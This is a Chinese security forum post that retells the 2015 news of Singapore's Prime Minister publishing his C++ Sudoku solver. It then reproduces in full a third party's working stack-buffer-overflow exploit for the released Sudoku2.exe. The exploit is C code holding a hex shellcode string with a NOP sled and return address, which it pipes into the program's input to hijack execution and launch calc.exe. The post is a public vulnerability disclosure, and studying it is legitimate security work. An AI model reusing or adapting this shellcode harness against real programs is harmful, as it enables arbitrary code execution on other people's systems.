- A+
所属分类:WooYun-Zone
五道口杀气 
| 2015-05-06 15:38
新加坡总理编写的解数独程序Sudoku2.exe存在溢出漏
参考新浪的这个新闻:新加坡总理李显龙还会编程:放出解数独代码
北京时间5月5日上午消息,虽然美国总统奥巴马曾经写过一个“Hello World”程序,但只能算是“打酱油”。不过,新加坡总理李显龙今天却在Facebook上发布了一组他亲自编写的复杂程序代码。
李显龙曾在4月20日的一次演讲中提到过这个程序。“我上次写程序是几年前的事情了,那是一个用C++编写的数独求解器,所以我已经过时了。”他说,“我的孩子都是学IT的,有两个都毕业于麻省理工学院。其中一个曾经浏览一本书,然后对我说,‘看看这里。’” 李显龙回忆道,那是一本Haskell编程语言的教科书,“那可能会成为我退休后的读物。”
那次演讲结束后,很多人要求李显龙公开那段代码,于是,他今天在Facebook上发布了一个截屏,还提供了一个指向Google Drive的链接,里面包含了这段代码及其输出示例和编译后的Windows可执行文件。
“这段程序很简单,只能以命令提示符的形式运行。”他写道,“逐行输入数据后(例如1-3-8---6),求解器就会输出答案(如果有多个答案,则会输出所有答案)、搜索答案所花费的步骤,以及一些搜索统计数据。”
“希望你们能从中找到乐趣。”他说,“如果发现任何漏洞,也请告诉我。”(书聿)
sudoku的源代码在google drive(需翻墙):
然后今天就刷到老外写的缓冲溢出漏洞的exp:
/* Sudoku2.exe stack overflow exploit
==================================
The Prime Minister of Singapore recently demonstrated his programming skills
by releasing source code and a binary for a C++ application "Sudoku Solver"
written several years ago. David Litchfield discovered a stack based buffer
overflow in scanf() alongside many other researchers. Source code and a 32bit
binary have been provided for the application at the following URL:
https://t.co/5fVUGi7EqN (also on Lee Hsien Loong facebook)
This exploit uses standard stack smashing techniques to grab EIP, land in
our buffer and WinExec()'s calc.exe. For great justice & the lulz. Tested
on Win7 x64 against the Sudoku2.exe binary.
greetingz to all .sg h4x0rz! ;-)
-- prdelka
*/
#include "stdafx.h"
#include <tchar.h>
#include <stdio.h>
#include <stdlib.h>
#include <memory.h>
#include <process.h>
#include <io.h>
#include <windows.h>
const char s[] = "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\xe8\x40\xE3\x74\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\xdb\xce\xd9\x74\x24\xf4\xb8\x2a\x06\xc3\xa2\x5b\x2b\xc9\xb1"
"\x31\x31\x43\x18\x03\x43\x18\x83\xc3\x2e\xe4\x36\x5e\xc6\x6a"
"\xb8\x9f\x16\x0b\x30\x7a\x27\x0b\x26\x0e\x17\xbb\x2c\x42\x9b"
"\x30\x60\x77\x28\x34\xad\x78\x99\xf3\x8b\xb7\x1a\xaf\xe8\xd6"
"\x98\xb2\x3c\x39\xa1\x7c\x31\x38\xe6\x61\xb8\x68\xbf\xee\x6f"
"\x9d\xb4\xbb\xb3\x16\x86\x2a\xb4\xcb\x5e\x4c\x95\x5d\xd5\x17"
"\x35\x5f\x3a\x2c\x7c\x47\x5f\x09\x36\xfc\xab\xe5\xc9\xd4\xe2"
"\x06\x65\x19\xcb\xf4\x77\x5d\xeb\xe6\x0d\x97\x08\x9a\x15\x6c"
"\x73\x40\x93\x77\xd3\x03\x03\x5c\xe2\xc0\xd2\x17\xe8\xad\x91"
"\x70\xec\x30\x75\x0b\x08\xb8\x78\xdc\x99\xfa\x5e\xf8\xc2\x59"
"\xfe\x59\xae\x0c\xff\xba\x11\xf0\xa5\xb1\xbf\xe5\xd7\x9b\xd5"
"\xf8\x6a\xa6\x9b\xfb\x74\xa9\x8b\x93\x45\x22\x44\xe3\x59\xe1"
"\x21\x1b\x10\xa8\x03\xb4\xfd\x38\x16\xd9\xfd\x96\x54\xe4\x7d"
"\x13\x24\x13\x9d\x56\x21\x5f\x19\x8a\x5b\xf0\xcc\xac\xc8\xf1"
"\xc4\xce\x8f\x61\x84\x3e\x2a\x02\x2f\x3f";
HANDLE g_hChildStd_IN_Rd = NULL;
HANDLE g_hChildStd_IN_Wr = NULL;
int _tmain(int argc, _TCHAR* argv[]) {
TCHAR szCmdline[]=TEXT("Sudoku2.exe");
STARTUPINFO si;
PROCESS_INFORMATION pi;
SECURITY_ATTRIBUTES saAttr;
saAttr.nLength = sizeof(SECURITY_ATTRIBUTES);
saAttr.bInheritHandle = TRUE;
saAttr.lpSecurityDescriptor = NULL;
CreatePipe(&g_hChildStd_IN_Rd, &g_hChildStd_IN_Wr, &saAttr, 0);
SetHandleInformation(g_hChildStd_IN_Wr, HANDLE_FLAG_INHERIT, 0);
ZeroMemory( &pi, sizeof(PROCESS_INFORMATION) );
ZeroMemory( &si, sizeof(STARTUPINFO) );
si.cb = sizeof(STARTUPINFO);
si.hStdInput = g_hChildStd_IN_Rd;
si.dwFlags |= STARTF_USESTDHANDLES;
CreateProcess(NULL,szCmdline,NULL,NULL,TRUE,0,NULL,NULL,&si,&pi);
CloseHandle(pi.hProcess);
CloseHandle(pi.hThread);
DWORD dwWritten;
WriteFile(g_hChildStd_IN_Wr,s,strlen(s),&dwWritten,NULL);
CloseHandle(g_hChildStd_IN_Wr);
WaitForSingleObject( pi.hProcess, INFINITE );
return 0;
}
